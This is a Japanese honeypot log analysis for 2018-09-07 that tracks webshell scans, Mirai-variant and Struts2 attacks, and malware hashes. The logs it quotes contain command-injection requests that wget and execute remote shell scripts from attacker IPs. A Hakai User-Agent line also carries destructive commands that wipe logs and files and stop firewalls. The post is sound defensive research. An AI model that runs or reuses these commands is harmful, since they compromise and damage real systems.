ハニーポットのログ分析（2018/09/07）

WOWhoneypotの2018/09/07(金) (運用94日目)の簡易分析です。
本日の総アクセス件数は 191件です。以下が全アクセスログです。

27 2018-09-07 GET /
14 2018-09-07 GET /index.action
5 2018-09-07 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://77.87.77.250/izuku.sh%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$
4 2018-09-07 POST /qq.php
3 2018-09-07 POST /qaq.php
2 2018-09-07 POST /xx.php
2 2018-09-07 POST /q.php
2 2018-09-07 GET /shell.php
2 2018-09-07 GET /pma/scripts/setup.php
2 2018-09-07 GET /phpmyadmin/scripts/setup.php
2 2018-09-07 GET /cmd.php
1 2018-09-07 POST /zuoshou.php
1 2018-09-07 POST /zuo.php
1 2018-09-07 POST /zuoindex.php
1 2018-09-07 POST /zshmindex.php
1 2018-09-07 POST /yumo.php
1 2018-09-07 POST /yao.php
1 2018-09-07 POST /xz.php
1 2018-09-07 POST /xw.php
1 2018-09-07 POST /xw1.php
1 2018-09-07 POST /xshell.php
1 2018-09-07 POST /xiao.php
1 2018-09-07 POST /xiaomar.php
1 2018-09-07 POST /xiaoma.php
1 2018-09-07 POST /xiaomae.php
1 2018-09-07 POST /wuwu11.php
1 2018-09-07 POST /wshell.php
1 2018-09-07 POST /w.php
1 2018-09-07 POST /wp-admins.php
1 2018-09-07 POST /weixiao.php
1 2018-09-07 POST /webslee.php
1 2018-09-07 POST /wc.php
1 2018-09-07 POST /wan.php
1 2018-09-07 POST /wanan.php
1 2018-09-07 POST /tiandi.php
1 2018-09-07 POST /test.php
1 2018-09-07 POST /system.php
1 2018-09-07 POST /ssaa.php
1 2018-09-07 POST /s.php
1 2018-09-07 POST /sheep.php
1 2018-09-07 POST /sean.php
1 2018-09-07 POST /qwe.php
1 2018-09-07 POST /python.php
1 2018-09-07 POST /post.php
1 2018-09-07 POST /phpStudy.php
1 2018-09-07 POST /phpstudy.php
1 2018-09-07 POST /phpinfi.php
1 2018-09-07 POST /pe.php
1 2018-09-07 POST /mz.php
1 2018-09-07 POST /mx.php
1 2018-09-07 POST /m.php?pbid=open
1 2018-09-07 POST /min.php
1 2018-09-07 POST /log.php
1 2018-09-07 POST /linuxse.php
1 2018-09-07 POST /lindex.php
1 2018-09-07 POST /l8.php
1 2018-09-07 POST /l7.php
1 2018-09-07 POST /ip.php
1 2018-09-07 POST /infoo.php
1 2018-09-07 POST /hm.php
1 2018-09-07 POST /hh.php
1 2018-09-07 POST /help.php
1 2018-09-07 POST /h1.php
1 2018-09-07 POST /feixiang.php
1 2018-09-07 POST /fack.php
1 2018-09-07 POST /defect.php
1 2018-09-07 POST /default.php
1 2018-09-07 POST /db_session.init.php
1 2018-09-07 POST /db.init.php
1 2018-09-07 POST /db__.init.php
1 2018-09-07 POST /db_desql.php
1 2018-09-07 POST /db_dataml.php
1 2018-09-07 POST /data.php
1 2018-09-07 POST /conflg.php
1 2018-09-07 POST /cmd.php
1 2018-09-07 POST /ceshi.php
1 2018-09-07 POST /cainiao.php
1 2018-09-07 POST /bak.php
1 2018-09-07 POST /aw.php
1 2018-09-07 POST /app.php
1 2018-09-07 POST /aotu.php
1 2018-09-07 POST /angge.php
1 2018-09-07 POST /ak.php
1 2018-09-07 POST /ak48.php
1 2018-09-07 POST /ak47.php
1 2018-09-07 POST /aaaa.php
1 2018-09-07 POST /9678.php
1 2018-09-07 POST /9510.php
1 2018-09-07 POST /56.php
1 2018-09-07 POST /3.php
1 2018-09-07 POST /12.php
1 2018-09-07 POST /1213.php
1 2018-09-07 GET /z.php
1 2018-09-07 GET /x.php
1 2018-09-07 GET /wpo.php
1 2018-09-07 GET /wp-config.php
1 2018-09-07 GET /webdav/
1 2018-09-07 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
1 2018-09-07 GET /uploader.php
1 2018-09-07 GET /text.php
1 2018-09-07 GET /test.php
1 2018-09-07 GET /scripts/setup.php
1 2018-09-07 GET /robots.txt
1 2018-09-07 GET /_query.php
1 2018-09-07 GET /pmd_online.php
1 2018-09-07 GET /phpMyAdmin/scripts/setup.php
1 2018-09-07 GET /mysql/scripts/setup.php
1 2018-09-07 GET /mysqladmin/scripts/setup.php
1 2018-09-07 GET /MyAdmin/scripts/setup.php
1 2018-09-07 GET /myAdmin/scripts/setup.php
1 2018-09-07 GET /myadmin/scripts/setup.php
1 2018-09-07 GET /muhstiks.php
1 2018-09-07 GET /muhstik.php
1 2018-09-07 GET /muhstik-dpr.php
1 2018-09-07 GET /muhstik2.php
1 2018-09-07 GET /lol.php
1 2018-09-07 GET /log.php
1 2018-09-07 GET /logon.php
1 2018-09-07 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://80.211.148.109/bins.sh%20-O%20-%3E%20%20chmod%20777%20bins.sh;%20%20./build.sh%27$
1 2018-09-07 GET /license.php
1 2018-09-07 GET /lala.php
1 2018-09-07 GET /lala-dpr.php
1 2018-09-07 GET /knal.php
1 2018-09-07 GET /java.php
1 2018-09-07 GET hxxp://112.35.88.28:10083/index.php
1 2018-09-07 GET hxxp://112.35.53.83:10083/index.php
1 2018-09-07 GET /help.php
1 2018-09-07 GET /help-e.php
1 2018-09-07 GET /hell.php
1 2018-09-07 GET /desktop.ini.php
1 2018-09-07 GET /db_pma.php
1 2018-09-07 GET /db_cts.php
1 2018-09-07 GET /cmx.php
1 2018-09-07 GET /cmv.php
1 2018-09-07 GET /cmdd.php
1 2018-09-07 GET /appserv.php
1 2018-09-07 CONNECT www.baidu.com

phpMyAdmin関連（14件）とWebShellの調査（124件）と/へのアクセスを除外したアクセス数です。

14 2018-09-07 GET /index.action
5 2018-09-07 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://77.87.77[.]250/izuku.sh%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$
1 2018-09-07 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://80.211.148[.]109/bins.sh%20-O%20-%3E%20%20chmod%20777%20bins.sh;%20%20./build.sh%27$
1 2018-09-07 GET /webdav/
1 2018-09-07 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
1 2018-09-07 GET /robots.txt
1 2018-09-07 GET hxxp://112.35.88.28:10083/index.php
1 2018-09-07 GET hxxp://112.35.53.83:10083/index.php
1 2018-09-07 CONNECT www.baidu.com

ApacheStruts2の脆弱性（S2-045/CVE-2017-5638）を狙った攻撃が本日も来ています。3日連続できている、というのが少し気になります。
本日の取得先は hxxp://104.148.70[.]5:8080/net7000 です。
URLscan.ioで調べると、このファイルのHashがわかります。
https://urlscan.io/result/345c16ad-b8cc-42b7-a2d8-1e764cd11e8b
このHashからVirusTotalで調べると以下が出てきます。
https://www.virustotal.com/#/file/bce27edf78baef4a090ca17e2c6c512570fa420bea34553e7a8b999e65d234b0/detection
Linux向けのDDoS用マルウェアでSETAGやGaniwと呼ばれているようです。

D-Linkの脆弱性を狙ったMirai亜種のアクセスが本日もあり、以下来ています。

5 User-Agent: Hakai/2.0
1 User-Agent: Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;

1件のみのアクセスのものは、User-Agentにコマンドが含まれています。これまで見たことがないパターンです。コマンドの内容もHakaiを名乗るだけある凶悪な内容です。

こちらのパターンのペイロードについて、調べてみます。
URLscan.ioで該当のパス、hxxp://80.211.148[.]109/bins.sh を調べたところ、hashについて記載がありました。
https://urlscan.io/result/af3f5c57-9742-41b5-a83e-1e9fdf984eb3/
そのhashでVirusTotalで調査すると、以下が見つかります。
https://www.virustotal.com/#/file/29a4202a8eec8438ffc033e4b777ec541edb30fca3cd903549abd8b16f29f846/behavior
シェルスクリプトであり、中身はこれまでのMirai亜種と同様のものかと思われます。

本日のドメインでのアクセスは以下です。アクセス元は1IPのみです。

2 GET /
1 GET /robots.txt

本日のハンティングログは以下です。Mirai亜種とApache Struts2のものです。

5 2018-09-07 wget hxxp://77.87.77[.]250/izuku.sh
1 2018-09-07 wget hxxp://80.211.148[.]109/bins.sh
1 2018-09-07 wget hxxp://104.148.70[.]5:8080/net7000

以上です。

S-Owl

S(ecurity)Owl

ハニーポットのログ分析（2018/09/07）